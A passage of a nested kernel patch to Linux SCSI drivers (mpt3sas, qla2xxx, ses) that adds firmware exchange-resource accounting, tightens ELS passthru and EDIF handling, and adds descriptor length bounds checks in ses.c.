++	if (ioc->is_mcpu_endpoint || sizeof(dma_addr_t) == 4) {
+ 		ioc->dma_mask = 32;
+ 		coherent_dma_mask = dma_mask = DMA_BIT_MASK(32);
+ 	/* Set 63 bit DMA mask for all SAS3 and SAS35 controllers */
+@@ -5850,6 +5849,9 @@ _base_release_memory_pools(struct MPT3SAS_ADAPTER *ioc)
+ 		}
+ 		dma_pool_destroy(ioc->pcie_sgl_dma_pool);
+ 	}
++	kfree(ioc->pcie_sg_lookup);
++	ioc->pcie_sg_lookup = NULL;
++
+ 	if (ioc->config_page) {
+ 		dexitprintk(ioc,
+ 			    ioc_info(ioc, "config_page(0x%p): free\n",
+diff --git a/drivers/scsi/qla2xxx/qla_bsg.c b/drivers/scsi/qla2xxx/qla_bsg.c
+index cd75b179410d7..dba7bba788d76 100644
+--- a/drivers/scsi/qla2xxx/qla_bsg.c
++++ b/drivers/scsi/qla2xxx/qla_bsg.c
+@@ -278,8 +278,8 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 	const char *type;
+ 	int req_sg_cnt, rsp_sg_cnt;
+ 	int rval =  (DID_ERROR << 16);
+-	uint16_t nextlid = 0;
+ 	uint32_t els_cmd = 0;
++	int qla_port_allocated = 0;
+ 
+ 	if (bsg_request->msgcode == FC_BSG_RPT_ELS) {
+ 		rport = fc_bsg_to_rport(bsg_job);
+@@ -329,9 +329,9 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 		/* make sure the rport is logged in,
+ 		 * if not perform fabric login
+ 		 */
+-		if (qla2x00_fabric_login(vha, fcport, &nextlid)) {
++		if (atomic_read(&fcport->state) != FCS_ONLINE) {
+ 			ql_dbg(ql_dbg_user, vha, 0x7003,
+-			    "Failed to login port %06X for ELS passthru.\n",
++			    "Port %06X is not online for ELS passthru.\n",
+ 			    fcport->d_id.b24);
+ 			rval = -EIO;
+ 			goto done;
+@@ -348,6 +348,7 @@ qla2x00_process_els(struct bsg_job *bsg_job)
+ 			goto done;
+ 		}
+ 
++		qla_port_allocated = 1;
+ 		/* Initialize all required  fields of fcport */
+ 		fcport->vha = vha;
+ 		fcport->d_id.b.al_pa =
+@@ -432,7 +433,7 @@ done_unmap_sg:
+ 	goto done_free_fcport;
+ 
+ done_free_fcport:
+-	if (bsg_request->msgcode != FC_BSG_RPT_ELS)
++	if (qla_port_allocated)
+ 		qla2x00_free_fcport(fcport);
+ done:
+ 	return rval;
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index a26a373be9da3..cd4eb11b07079 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -660,7 +660,7 @@ enum {
+ 
+ struct iocb_resource {
+ 	u8 res_type;
+-	u8 pad;
++	u8  exch_cnt;
+ 	u16 iocb_cnt;
+ };
+ 
+@@ -3721,6 +3721,10 @@ struct qla_fw_resources {
+ 	u16 iocbs_limit;
+ 	u16 iocbs_qp_limit;
+ 	u16 iocbs_used;
++	u16 exch_total;
++	u16 exch_limit;
++	u16 exch_used;
++	u16 pad;
+ };
+ 
+ #define QLA_IOCB_PCT_LIMIT 95
+diff --git a/drivers/scsi/qla2xxx/qla_dfs.c b/drivers/scsi/qla2xxx/qla_dfs.c
+index 777808af56347..1925cc6897b68 100644
+--- a/drivers/scsi/qla2xxx/qla_dfs.c
++++ b/drivers/scsi/qla2xxx/qla_dfs.c
+@@ -235,7 +235,7 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 	uint16_t mb[MAX_IOCB_MB_REG];
+ 	int rc;
+ 	struct qla_hw_data *ha = vha->hw;
+-	u16 iocbs_used, i;
++	u16 iocbs_used, i, exch_used;
+ 
+ 	rc = qla24xx_res_count_wait(vha, mb, SIZEOF_IOCB_MB_REG);
+ 	if (rc != QLA_SUCCESS) {
+@@ -263,13 +263,19 @@ qla_dfs_fw_resource_cnt_show(struct seq_file *s, void *unused)
+ 	if (ql2xenforce_iocb_limit) {
+ 		/* lock is not require. It's an estimate. */
+ 		iocbs_used = ha->base_qpair->fwres.iocbs_used;
++		exch_used = ha->base_qpair->fwres.exch_used;
+ 		for (i = 0; i < ha->max_qpairs; i++) {
+-			if (ha->queue_pair_map[i])
++			if (ha->queue_pair_map[i]) {
+ 				iocbs_used += ha->queue_pair_map[i]->fwres.iocbs_used;
++				exch_used += ha->queue_pair_map[i]->fwres.exch_used;
++			}
+ 		}
+ 
+ 		seq_printf(s, "Driver: estimate iocb used [%d] high water limit [%d]\n",
+ 			   iocbs_used, ha->base_qpair->fwres.iocbs_limit);
++
++		seq_printf(s, "estimate exchange used[%d] high water limit [%d] n",
++			   exch_used, ha->base_qpair->fwres.exch_limit);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/scsi/qla2xxx/qla_edif.c b/drivers/scsi/qla2xxx/qla_edif.c
+index 00ccc41cef147..1cafd27d5a609 100644
+--- a/drivers/scsi/qla2xxx/qla_edif.c
++++ b/drivers/scsi/qla2xxx/qla_edif.c
+@@ -925,7 +925,9 @@ qla_edif_app_getfcinfo(scsi_qla_host_t *vha, struct bsg_job *bsg_job)
+ 			if (!(fcport->flags & FCF_FCSP_DEVICE))
+ 				continue;
+ 
+-			tdid = app_req.remote_pid;
++			tdid.b.domain = app_req.remote_pid.domain;
++			tdid.b.area = app_req.remote_pid.area;
++			tdid.b.al_pa = app_req.remote_pid.al_pa;
+ 
+ 			ql_dbg(ql_dbg_edif, vha, 0x2058,
+ 			    "APP request entry - portid=%06x.\n", tdid.b24);
+@@ -2989,9 +2991,10 @@ qla28xx_start_scsi_edif(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -3185,7 +3188,7 @@ queuing_error:
+ 		mempool_free(sp->u.scmd.ct6_ctx, ha->ctx_mempool);
+ 		sp->u.scmd.ct6_ctx = NULL;
+ 	}
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+diff --git a/drivers/scsi/qla2xxx/qla_edif_bsg.h b/drivers/scsi/qla2xxx/qla_edif_bsg.h
+index 0931f4e4e127a..514c265ba86e2 100644
+--- a/drivers/scsi/qla2xxx/qla_edif_bsg.h
++++ b/drivers/scsi/qla2xxx/qla_edif_bsg.h
+@@ -89,7 +89,20 @@ struct app_plogi_reply {
+ struct app_pinfo_req {
+ 	struct app_id app_info;
+ 	uint8_t	 num_ports;
+-	port_id_t remote_pid;
++	struct {
++#ifdef __BIG_ENDIAN
++		uint8_t domain;
++		uint8_t area;
++		uint8_t al_pa;
++#elif defined(__LITTLE_ENDIAN)
++		uint8_t al_pa;
++		uint8_t area;
++		uint8_t domain;
++#else
++#error "__BIG_ENDIAN or __LITTLE_ENDIAN must be defined!"
++#endif
++		uint8_t rsvd_1;
++	} remote_pid;
+ 	uint8_t		version;
+ 	uint8_t		pad[VND_CMD_PAD_SIZE];
+ 	uint8_t		reserved[VND_CMD_APP_RESERVED_SIZE];
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 432f47fc5e1f3..a8d822c4e3bac 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -128,12 +128,14 @@ static void qla24xx_abort_iocb_timeout(void *data)
+ 		    sp->cmd_sp)) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
+ 			cmdsp_found = 1;
++			qla_put_fw_resources(qpair, &sp->cmd_sp->iores);
+ 		}
+ 
+ 		/* removing the abort */
+ 		if (qpair->req->outstanding_cmds[handle] == sp) {
+ 			qpair->req->outstanding_cmds[handle] = NULL;
+ 			sp_found = 1;
++			qla_put_fw_resources(qpair, &sp->iores);
+ 			break;
+ 		}
+ 	}
+@@ -2000,6 +2002,7 @@ qla2x00_tmf_iocb_timeout(void *data)
+ 		for (h = 1; h < sp->qpair->req->num_outstanding_cmds; h++) {
+ 			if (sp->qpair->req->outstanding_cmds[h] == sp) {
+ 				sp->qpair->req->outstanding_cmds[h] = NULL;
++				qla_put_fw_resources(sp->qpair, &sp->iores);
+ 				break;
+ 			}
+ 		}
+@@ -2073,7 +2076,6 @@ qla2x00_async_tm_cmd(fc_port_t *fcport, uint32_t flags, uint32_t lun,
+ done_free_sp:
+ 	/* ref: INIT */
+ 	kref_put(&sp->cmd_kref, qla2x00_sp_release);
+-	fcport->flags &= ~FCF_ASYNC_SENT;
+ done:
+ 	return rval;
+ }
+@@ -3943,6 +3945,12 @@ void qla_init_iocb_limit(scsi_qla_host_t *vha)
+ 	ha->base_qpair->fwres.iocbs_limit = limit;
+ 	ha->base_qpair->fwres.iocbs_qp_limit = limit / num_qps;
+ 	ha->base_qpair->fwres.iocbs_used = 0;
++
++	ha->base_qpair->fwres.exch_total = ha->orig_fw_xcb_count;
++	ha->base_qpair->fwres.exch_limit = (ha->orig_fw_xcb_count *
++					    QLA_IOCB_PCT_LIMIT) / 100;
++	ha->base_qpair->fwres.exch_used  = 0;
++
+ 	for (i = 0; i < ha->max_qpairs; i++) {
+ 		if (ha->queue_pair_map[i])  {
+ 			ha->queue_pair_map[i]->fwres.iocbs_total =
+@@ -3951,6 +3959,10 @@ void qla_init_iocb_limit(scsi_qla_host_t *vha)
+ 			ha->queue_pair_map[i]->fwres.iocbs_qp_limit =
+ 				limit / num_qps;
+ 			ha->queue_pair_map[i]->fwres.iocbs_used = 0;
++			ha->queue_pair_map[i]->fwres.exch_total = ha->orig_fw_xcb_count;
++			ha->queue_pair_map[i]->fwres.exch_limit =
++				(ha->orig_fw_xcb_count * QLA_IOCB_PCT_LIMIT) / 100;
++			ha->queue_pair_map[i]->fwres.exch_used = 0;
+ 		}
+ 	}
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_inline.h b/drivers/scsi/qla2xxx/qla_inline.h
+index 5185dc5daf80d..b0ee307b5d4b9 100644
+--- a/drivers/scsi/qla2xxx/qla_inline.h
++++ b/drivers/scsi/qla2xxx/qla_inline.h
+@@ -380,24 +380,26 @@ qla2xxx_get_fc4_priority(struct scsi_qla_host *vha)
+ 
+ enum {
+ 	RESOURCE_NONE,
+-	RESOURCE_INI,
++	RESOURCE_IOCB = BIT_0,
++	RESOURCE_EXCH = BIT_1,  /* exchange */
++	RESOURCE_FORCE = BIT_2,
+ };
+ 
+ static inline int
+-qla_get_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
++qla_get_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+ 	u16 iocbs_used, i;
++	u16 exch_used;
+ 	struct qla_hw_data *ha = qp->vha->hw;
+ 
+ 	if (!ql2xenforce_iocb_limit) {
+ 		iores->res_type = RESOURCE_NONE;
+ 		return 0;
+ 	}
++	if (iores->res_type & RESOURCE_FORCE)
++		goto force;
+ 
+-	if ((iores->iocb_cnt + qp->fwres.iocbs_used) < qp->fwres.iocbs_qp_limit) {
+-		qp->fwres.iocbs_used += iores->iocb_cnt;
+-		return 0;
+-	} else {
++	if ((iores->iocb_cnt + qp->fwres.iocbs_used) >= qp->fwres.iocbs_qp_limit) {
+ 		/* no need to acquire qpair lock. It's just rough calculation */
+ 		iocbs_used = ha->base_qpair->fwres.iocbs_used;
+ 		for (i = 0; i < ha->max_qpairs; i++) {
+@@ -405,30 +407,49 @@ qla_get_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
+ 				iocbs_used += ha->queue_pair_map[i]->fwres.iocbs_used;
+ 		}
+ 
+-		if ((iores->iocb_cnt + iocbs_used) < qp->fwres.iocbs_limit) {
+-			qp->fwres.iocbs_used += iores->iocb_cnt;
+-			return 0;
+-		} else {
++		if ((iores->iocb_cnt + iocbs_used) >= qp->fwres.iocbs_limit) {
++			iores->res_type = RESOURCE_NONE;
++			return -ENOSPC;
++		}
++	}
++
++	if (iores->res_type & RESOURCE_EXCH) {
++		exch_used = ha->base_qpair->fwres.exch_used;
++		for (i = 0; i < ha->max_qpairs; i++) {
++			if (ha->queue_pair_map[i])
++				exch_used += ha->queue_pair_map[i]->fwres.exch_used;
++		}
++
++		if ((exch_used + iores->exch_cnt) >= qp->fwres.exch_limit) {
+ 			iores->res_type = RESOURCE_NONE;
+ 			return -ENOSPC;
+ 		}
+ 	}
++force:
++	qp->fwres.iocbs_used += iores->iocb_cnt;
++	qp->fwres.exch_used += iores->exch_cnt;
++	return 0;
+ }
+ 
+ static inline void
+-qla_put_iocbs(struct qla_qpair *qp, struct iocb_resource *iores)
++qla_put_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
+-	switch (iores->res_type) {
+-	case RESOURCE_NONE:
+-		break;
+-	default:
++	if (iores->res_type & RESOURCE_IOCB) {
+ 		if (qp->fwres.iocbs_used >= iores->iocb_cnt) {
+ 			qp->fwres.iocbs_used -= iores->iocb_cnt;
+ 		} else {
+-			// should not happen
++			/* should not happen */
+ 			qp->fwres.iocbs_used = 0;
+ 		}
+-		break;
++	}
++
++	if (iores->res_type & RESOURCE_EXCH) {
++		if (qp->fwres.exch_used >= iores->exch_cnt) {
++			qp->fwres.exch_used -= iores->exch_cnt;
++		} else {
++			/* should not happen */
++			qp->fwres.exch_used = 0;
++		}
+ 	}
+ 	iores->res_type = RESOURCE_NONE;
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index 42ce4e1fe7441..4f48f098ea5a6 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -1589,9 +1589,10 @@ qla24xx_start_scsi(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -1678,7 +1679,7 @@ queuing_error:
+ 	if (tot_dsds)
+ 		scsi_dma_unmap(cmd);
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -1793,9 +1794,10 @@ qla24xx_dif_start_scsi(srb_t *sp)
+ 	tot_prot_dsds = nseg;
+ 	tot_dsds += nseg;
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -1883,7 +1885,7 @@ queuing_error:
+ 	}
+ 	/* Cleanup will be performed by the caller (queuecommand) */
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -1952,9 +1954,10 @@ qla2xxx_start_scsi_mq(srb_t *sp)
+ 	tot_dsds = nseg;
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = req_cnt;
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -2041,7 +2044,7 @@ queuing_error:
+ 	if (tot_dsds)
+ 		scsi_dma_unmap(cmd);
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -2171,9 +2174,10 @@ qla2xxx_dif_start_scsi_mq(srb_t *sp)
+ 	tot_prot_dsds = nseg;
+ 	tot_dsds += nseg;
+ 
+-	sp->iores.res_type = RESOURCE_INI;
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
+ 	sp->iores.iocb_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
+-	if (qla_get_iocbs(sp->qpair, &sp->iores))
++	if (qla_get_fw_resources(sp->qpair, &sp->iores))
+ 		goto queuing_error;
+ 
+ 	if (req->cnt < (req_cnt + 2)) {
+@@ -2260,7 +2264,7 @@ queuing_error:
+ 	}
+ 	/* Cleanup will be performed by the caller (queuecommand) */
+ 
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return QLA_FUNCTION_FAILED;
+@@ -3813,6 +3817,65 @@ qla24xx_prlo_iocb(srb_t *sp, struct logio_entry_24xx *logio)
+ 	logio->vp_index = sp->fcport->vha->vp_idx;
+ }
+ 
++int qla_get_iocbs_resource(struct srb *sp)
++{
++	bool get_exch;
++	bool push_it_through = false;
++
++	if (!ql2xenforce_iocb_limit) {
++		sp->iores.res_type = RESOURCE_NONE;
++		return 0;
++	}
++	sp->iores.res_type = RESOURCE_NONE;
++
++	switch (sp->type) {
++	case SRB_TM_CMD:
++	case SRB_PRLI_CMD:
++	case SRB_ADISC_CMD:
++		push_it_through = true;
++		fallthrough;
++	case SRB_LOGIN_CMD:
++	case SRB_ELS_CMD_RPT:
++	case SRB_ELS_CMD_HST:
++	case SRB_ELS_CMD_HST_NOLOGIN:
++	case SRB_CT_CMD:
++	case SRB_NVME_LS:
++	case SRB_ELS_DCMD:
++		get_exch = true;
++		break;
++
++	case SRB_FXIOCB_DCMD:
++	case SRB_FXIOCB_BCMD:
++		sp->iores.res_type = RESOURCE_NONE;
++		return 0;
++
++	case SRB_SA_UPDATE:
++	case SRB_SA_REPLACE:
++	case SRB_MB_IOCB:
++	case SRB_ABT_CMD:
++	case SRB_NACK_PLOGI:
++	case SRB_NACK_PRLI:
++	case SRB_NACK_LOGO:
++	case SRB_LOGOUT_CMD:
++	case SRB_CTRL_VP:
++		push_it_through = true;
++		fallthrough;
++	default:
++		get_exch = false;
++	}
++
++	sp->iores.res_type |= RESOURCE_IOCB;
++	sp->iores.iocb_cnt = 1;
++	if (get_exch) {
++		sp->iores.res_type |= RESOURCE_EXCH;
++		sp->iores.exch_cnt = 1;
++	}
++	if (push_it_through)
++		sp->iores.res_type |= RESOURCE_FORCE;
++
++	return qla_get_fw_resources(sp->qpair, &sp->iores);
++}
++
+ int
+ qla2x00_start_sp(srb_t *sp)
+ {
+@@ -3827,6 +3890,12 @@ qla2x00_start_sp(srb_t *sp)
+ 		return -EIO;
+ 
+ 	spin_lock_irqsave(qp->qp_lock_ptr, flags);
++	rval = qla_get_iocbs_resource(sp);
++	if (rval) {
++		spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
++		return -EAGAIN;
++	}
++
+ 	pkt = __qla2x00_alloc_iocbs(sp->qpair, sp);
+ 	if (!pkt) {
+ 		rval = EAGAIN;
+@@ -3927,6 +3996,8 @@ qla2x00_start_sp(srb_t *sp)
+ 	wmb();
+ 	qla2x00_start_iocbs(vha, qp->req);
+ done:
++	if (rval)
++		qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
+ 	return rval;
+ }
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index e19fde304e5c6..cbbd7014da939 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -3112,6 +3112,7 @@ qla25xx_process_bidir_status_iocb(scsi_qla_host_t *vha, void *pkt,
+ 	}
+ 	bsg_reply->reply_payload_rcv_len = 0;
+ 
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ done:
+ 	/* Return the vendor specific reply to API */
+ 	bsg_reply->reply_data.vendor_reply.vendor_rsp[0] = rval;
+@@ -3197,7 +3198,7 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 		}
+ 		return;
+ 	}
+-	qla_put_iocbs(sp->qpair, &sp->iores);
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 
+ 	if (sp->cmd_type != TYPE_SRB) {
+ 		req->outstanding_cmds[handle] = NULL;
+@@ -3362,8 +3363,6 @@ qla2x00_status_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, void *pkt)
+ 				       "Dropped frame(s) detected (0x%x of 0x%x bytes).\n",
+ 				       resid, scsi_bufflen(cp));
+ 
+-				vha->interface_err_cnt++;
+-
+ 				res = DID_ERROR << 16 | lscsi_status;
+ 				goto check_scsi_status;
+ 			}
+@@ -3618,7 +3617,6 @@ qla2x00_error_entry(scsi_qla_host_t *vha, struct rsp_que *rsp, sts_entry_t *pkt)
+ 	default:
+ 		sp = qla2x00_get_sp_from_handle(vha, func, req, pkt);
+ 		if (sp) {
+-			qla_put_iocbs(sp->qpair, &sp->iores);
+ 			sp->done(sp, res);
+ 			return 0;
+ 		}
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index 02fdeb0d31ec4..c57e02a355219 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -170,18 +170,6 @@ out:
+ 	qla2xxx_rel_qpair_sp(sp->qpair, sp);
+ }
+ 
+-static void qla_nvme_ls_unmap(struct srb *sp, struct nvmefc_ls_req *fd)
+-{
+-	if (sp->flags & SRB_DMA_VALID) {
+-		struct srb_iocb *nvme = &sp->u.iocb_cmd;
+-		struct qla_hw_data *ha = sp->fcport->vha->hw;
+-
+-		dma_unmap_single(&ha->pdev->dev, nvme->u.nvme.cmd_dma,
+-				 fd->rqstlen, DMA_TO_DEVICE);
+-		sp->flags &= ~SRB_DMA_VALID;
+-	}
+-}
+-
+ static void qla_nvme_release_ls_cmd_kref(struct kref *kref)
+ {
+ 	struct srb *sp = container_of(kref, struct srb, cmd_kref);
+@@ -199,7 +187,6 @@ static void qla_nvme_release_ls_cmd_kref(struct kref *kref)
+ 
+ 	fd = priv->fd;
+ 
+-	qla_nvme_ls_unmap(sp, fd);
+ 	fd->done(fd, priv->comp_status);
+ out:
+ 	qla2x00_rel_sp(sp);
+@@ -365,13 +352,10 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 	nvme->u.nvme.rsp_len = fd->rsplen;
+ 	nvme->u.nvme.rsp_dma = fd->rspdma;
+ 	nvme->u.nvme.timeout_sec = fd->timeout;
+-	nvme->u.nvme.cmd_dma = dma_map_single(&ha->pdev->dev, fd->rqstaddr,
+-	    fd->rqstlen, DMA_TO_DEVICE);
++	nvme->u.nvme.cmd_dma = fd->rqstdma;
+ 	dma_sync_single_for_device(&ha->pdev->dev, nvme->u.nvme.cmd_dma,
+ 	    fd->rqstlen, DMA_TO_DEVICE);
+ 
+-	sp->flags |= SRB_DMA_VALID;
+-
+ 	rval = qla2x00_start_sp(sp);
+ 	if (rval != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x700e,
+@@ -379,7 +363,6 @@ static int qla_nvme_ls_req(struct nvme_fc_local_port *lport,
+ 		wake_up(&sp->nvme_ls_waitq);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+-		qla_nvme_ls_unmap(sp, fd);
+ 		qla2x00_rel_sp(sp);
+ 		return rval;
+ 	}
+@@ -445,13 +428,24 @@ static inline int qla2x00_start_nvme_mq(srb_t *sp)
+ 		goto queuing_error;
+ 	}
+ 	req_cnt = qla24xx_calc_iocbs(vha, tot_dsds);
++
++	sp->iores.res_type = RESOURCE_IOCB | RESOURCE_EXCH;
++	sp->iores.exch_cnt = 1;
++	sp->iores.iocb_cnt = req_cnt;
++	if (qla_get_fw_resources(sp->qpair, &sp->iores)) {
++		rval = -EBUSY;
++		goto queuing_error;
++	}
++
+ 	if (req->cnt < (req_cnt + 2)) {
+ 		if (IS_SHADOW_REG_CAPABLE(ha)) {
+ 			cnt = *req->out_ptr;
+ 		} else {
+ 			cnt = rd_reg_dword_relaxed(req->req_q_out);
+-			if (qla2x00_check_reg16_for_disconnect(vha, cnt))
++			if (qla2x00_check_reg16_for_disconnect(vha, cnt)) {
++				rval = -EBUSY;
+ 				goto queuing_error;
++			}
+ 		}
+ 
+ 		if (req->ring_index < cnt)
+@@ -600,6 +594,8 @@ static inline int qla2x00_start_nvme_mq(srb_t *sp)
+ 		qla24xx_process_response_queue(vha, rsp);
+ 
+ queuing_error:
++	if (rval)
++		qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	spin_unlock_irqrestore(&qpair->qp_lock, flags);
+ 
+ 	return rval;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 96ba1398f20c1..6e33dc16ce6f3 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -7095,9 +7095,12 @@ qla2x00_do_dpc(void *data)
+ 			}
+ 		}
+ loop_resync_check:
+-		if (test_and_clear_bit(LOOP_RESYNC_NEEDED,
++		if (!qla2x00_reset_active(base_vha) &&
++		    test_and_clear_bit(LOOP_RESYNC_NEEDED,
+ 		    &base_vha->dpc_flags)) {
+-
++			/*
++			 * Allow abort_isp to complete before moving on to scanning.
++			 */
+ 			ql_dbg(ql_dbg_dpc, base_vha, 0x400f,
+ 			    "Loop resync scheduled.\n");
+ 
+@@ -7448,7 +7451,7 @@ qla2x00_timer(struct timer_list *t)
+ 
+ 		/* if the loop has been down for 4 minutes, reinit adapter */
+ 		if (atomic_dec_and_test(&vha->loop_down_timer) != 0) {
+-			if (!(vha->device_flags & DFLG_NO_CABLE)) {
++			if (!(vha->device_flags & DFLG_NO_CABLE) && !vha->vp_idx) {
+ 				ql_log(ql_log_warn, vha, 0x6009,
+ 				    "Loop down - aborting ISP.\n");
+ 
+diff --git a/drivers/scsi/ses.c b/drivers/scsi/ses.c
+index 0a1734f34587d..1707d6d144d21 100644
+--- a/drivers/scsi/ses.c
++++ b/drivers/scsi/ses.c
+@@ -433,8 +433,8 @@ int ses_match_host(struct enclosure_device *edev, void *data)
+ }
+ #endif  /*  0  */
+ 
+-static void ses_process_descriptor(struct enclosure_component *ecomp,
+-				   unsigned char *desc)
++static int ses_process_descriptor(struct enclosure_component *ecomp,
++				   unsigned char *desc, int max_desc_len)
+ {
+ 	int eip = desc[0] & 0x10;
+ 	int invalid = desc[0] & 0x80;
+@@ -445,22 +445,32 @@ static void ses_process_descriptor(struct enclosure_component *ecomp,
+ 	unsigned char *d;
+ 
+ 	if (invalid)
+-		return;
++		return 0;
+ 
+ 	switch (proto) {
+ 	case SCSI_PROTOCOL_FCP:
+ 		if (eip) {
++			if (max_desc_len <= 7)
++				return 1;
+ 			d = desc + 4;
+ 			slot = d[3];
+ 		}
+ 		break;
+ 	case SCSI_PROTOCOL_SAS:
++
+ 		if (eip) {
++			if (max_desc_len <= 27)
++				return 1;
+ 			d = desc + 4;
+ 			slot = d[3];
+ 			d = desc + 8;
+-		} else
++		} else {
++			if (max_desc_len <= 23)
++				return 1;
+ 			d = desc + 4;
++		}
++
++
+ 		/* only take the phy0 addr */
+ 		addr = (u64)d[12] << 56 |
+ 			(u64)d[13] << 48 |
+@@ -477,6 +487,8 @@ static void ses_process_descriptor(struct enclosure_component *ecomp,
+ 	}
+ 	ecomp->slot = slot;
+ 	scomp->addr = addr;
++
++	return 0;
+ }
+ 
+ struct efd {
+@@ -549,7 +561,7 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 		/* skip past overall descriptor */
+ 		desc_ptr += len + 4;
+ 	}
+-	if (ses_dev->page10)
++	if (ses_dev->page10 && ses_dev->page10_len > 9)
+ 		addl_desc_ptr = ses_dev->page10 + 8;
+ 	type_ptr = ses_dev->page1_types;
+ 	components = 0;
+@@ -557,17 +569,22 @@ static void ses_enclosure_data_process(struct enclosure_device *edev,
+ 		for (j = 0; j < type_ptr[1]; j++) {
+ 			char *name = NULL;
+ 			struct enclosure_component *ecomp;
++			int max_desc_len;
+ 
+ 			if (desc_ptr) {
+-				if (desc_ptr >= buf + page7_len) {
++				if (desc_ptr + 3 >= buf + page7_len) {
+ 					desc_ptr = NULL;
+ 				} else {
